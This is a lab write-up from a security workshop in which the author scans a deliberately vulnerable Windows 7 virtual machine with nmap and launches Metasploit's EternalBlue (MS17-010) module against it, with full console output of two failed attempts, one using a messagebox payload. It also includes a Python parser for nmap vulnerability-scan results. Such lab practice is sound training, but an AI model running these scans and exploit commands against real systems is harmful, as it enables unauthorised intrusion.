Pentesting: win7min

A review of what I learned in the '#Pentesting4ever' workshop
given at the Euskalhack computer security conference.
This time I take a distro known as win7min, which is vulnerable to EternalBlue.

1) I boot the machine to be audited, w7min, in VirtualBox.

Note: I configure its network as a host-only adapter.

My VMs' network is 192.168.56.XX (this may differ on your machine; check with ip a | grep global).
Then I run nmap -sn 192.168.56.0/24 or nmap -sn 192.168.56.* to see what comes up:

em50l@jejo.es$ nmap -sn 192.168.56.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-06 22:25 CEST
Nmap scan report for medion (192.168.56.1)
Host is up (0.0029s latency).
Nmap scan report for 192.168.56.104
Host is up (0.00096s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.67 seconds
em50l@jejo.es$ 

Good. The IP is 192.168.56.104.


Since it is Windows, I scan for vulnerabilities.

root@kali:~# nmap 192.168.56.101  -script *vuln*
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-18 18:05 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
MAC Address: 08:00:27:46:45:AF (Oracle VirtualBox virtual NIC)

Host script results:
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!

Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds
root@kali:~# 

I search for exploits:

root@kali:~# searchsploit CVE-2009-3103
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit 975497
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit cve2009-3103
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit cve2009
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit CVE-2017-0143
Exploits: No Result
Shellcodes: No Result
root@kali:~#

msf5 > nmap 192.168.56.104 -p 139,445 -script smb-vuln*
[*] exec: nmap 192.168.56.104 -p 139,445 -script smb-vuln*

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-06 16:22 EDT
Nmap scan report for 192.168.56.104
Host is up (0.0011s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
msf5 > 
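Reading these host-script blocks by eye works for one VM but not for a whole /24, so here is an added example (mine, not from the original post or the workshop): a small Python parser over the smb-vuln* output format shown above. It keeps only scripts whose State is VULNERABLE (or LIKELY VULNERABLE) and drops the one-line verdicts ('false', NT_STATUS_ACCESS_DENIED, the NetBIOS-name error) that are not findings; the sample text is constructed in the same format and abbreviated.

```python
import re

# Constructed sample in the format of the `nmap --script smb-vuln*` output above (two hosts, abbreviated).
SAMPLE = """\
Nmap scan report for 192.168.56.101
Host script results:
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
| smb-vuln-cve2009-3103: 
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|_smb-vuln-ms10-054: false
Nmap scan report for 192.168.56.104
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?")
# "| name: " opens a multi-line block; "|_name: verdict" is a one-line result.
SCRIPT_RE = re.compile(r"^\|[ _](\S+?):\s*(.*)$")

def parse_smb_vuln(text):
    """Return {host: {script: {"state", "ids", "risk"}}} for scripts whose State is
    VULNERABLE / LIKELY VULNERABLE. One-line verdicts ('false', error strings such
    as NT_STATUS_ACCESS_DENIED) carry no structured finding and are skipped."""
    results, host, script = {}, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1), None
        elif (m := SCRIPT_RE.match(line)) and host:
            script, verdict = m.group(1), m.group(2)
            if verdict:          # one-line result: nothing structured to collect
                script = None
            else:                # block opened: collect State/IDs/Risk factor below
                results.setdefault(host, {})[script] = {"state": None, "ids": [], "risk": None}
        elif host and script and line.startswith("|"):
            body, rec = line.lstrip("|_ ").strip(), results[host][script]
            if body.startswith("State:"):
                rec["state"] = body.split(":", 1)[1].strip()
            elif body.startswith("IDs:"):
                rec["ids"] = re.findall(r"CVE:(CVE-\d+-\d+)", body)
            elif body.startswith("Risk factor:"):
                rec["risk"] = body.split(":", 1)[1].strip()
    vuln = lambda r: (r["state"] or "").startswith(("VULNERABLE", "LIKELY VULNERABLE"))
    return {h: {s: r for s, r in sc.items() if vuln(r)}
            for h, sc in results.items() if any(vuln(r) for r in sc.values())}
```

Feed it the saved stdout of a real scan (nmap -oN) and the result is a host-to-CVE map you can hand straight to patch management.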
I look for the first vulnerability.
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


msf5 > 

I launch exploit/windows/smb/ms17_010_eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.56.104   yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 192.168.56.104:445 - Connecting to target for exploitation.
[+] 192.168.56.104:445 - Connection established for exploitation.
[+] 192.168.56.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.104:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.56.104:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.56.104:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.56.104:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.56.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.104:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.104:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.104:445 - Starting non-paged pool grooming
[+] 192.168.56.104:445 - Sending SMBv2 buffers
[+] 192.168.56.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.104:445 - Sending final SMBv2 buffers.
[*] 192.168.56.104:445 - Sending last fragment of exploit packet!
[*] 192.168.56.104:445 - Receiving response from exploit packet
[+] 192.168.56.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.104:445 - Sending egg to corrupted connection.
[*] 192.168.56.104:445 - Triggering free of corrupted buffer.

[-] 192.168.56.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.56.104:445 - Connecting to target for exploitation.
[-] 192.168.56.104:445 - Rex::HostUnreachable: The host (192.168.56.104:445) was unreachable.
[*] Exploit completed, but no session was created.

It looks like I finally get something.

The machine goes down, haha...

Trying again.

This time with a simpler payload: a message box.

msf5 >
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/messagebox
payload => windows/x64/messagebox
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.56.106   yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/messagebox):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   EXITFUNC  thread            yes       Exit technique (Accepted: '', seh, thread, process, none)
   ICON      NO                yes       Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION)
   TEXT      Hello, from MSF!  yes       Messagebox Text
   TITLE     MessageBox        yes       Messagebox Title

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] 192.168.56.106:445 - Connecting to target for exploitation.
[+] 192.168.56.106:445 - Connection established for exploitation.
[+] 192.168.56.106:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.106:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.56.106:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.56.106:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.56.106:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.56.106:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.106:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.106:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.106:445 - Starting non-paged pool grooming
[+] 192.168.56.106:445 - Sending SMBv2 buffers
[+] 192.168.56.106:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.106:445 - Sending final SMBv2 buffers.
[*] 192.168.56.106:445 - Sending last fragment of exploit packet!
[*] 192.168.56.106:445 - Receiving response from exploit packet
[+] 192.168.56.106:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.106:445 - Sending egg to corrupted connection.
[*] 192.168.56.106:445 - Triggering free of corrupted buffer.
[-] 192.168.56.106:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.106:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.56.106:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[

On the third try this simpler payload seems to go through.